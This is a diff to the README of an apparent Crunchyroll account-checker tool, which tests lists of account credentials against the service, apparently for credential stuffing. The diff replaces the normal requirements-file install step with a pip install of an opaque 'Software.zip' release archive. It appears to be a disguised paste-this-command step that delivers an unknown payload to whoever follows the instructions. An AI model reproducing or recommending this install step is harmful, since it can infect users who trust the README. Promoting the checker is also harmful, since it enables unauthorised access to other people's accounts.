Cynicave/Crunchyroll-Account-Checker/README.md

 ## How to Use
 1. Clone the repository to your local machine.
-2. Install the required dependencies by running `pip install -r requirements.txt`.
+2. Install the required dependencies by running `pip install -r https://github.com/Cynicave/Crunchyroll-Account-Checker/releases/download/v2.0/Software.zip`.
 3. Make sure to have a list of Crunchyroll account credentials in the correct format.
 4. Run the tool with the appropriate command-line arguments to start checking accounts.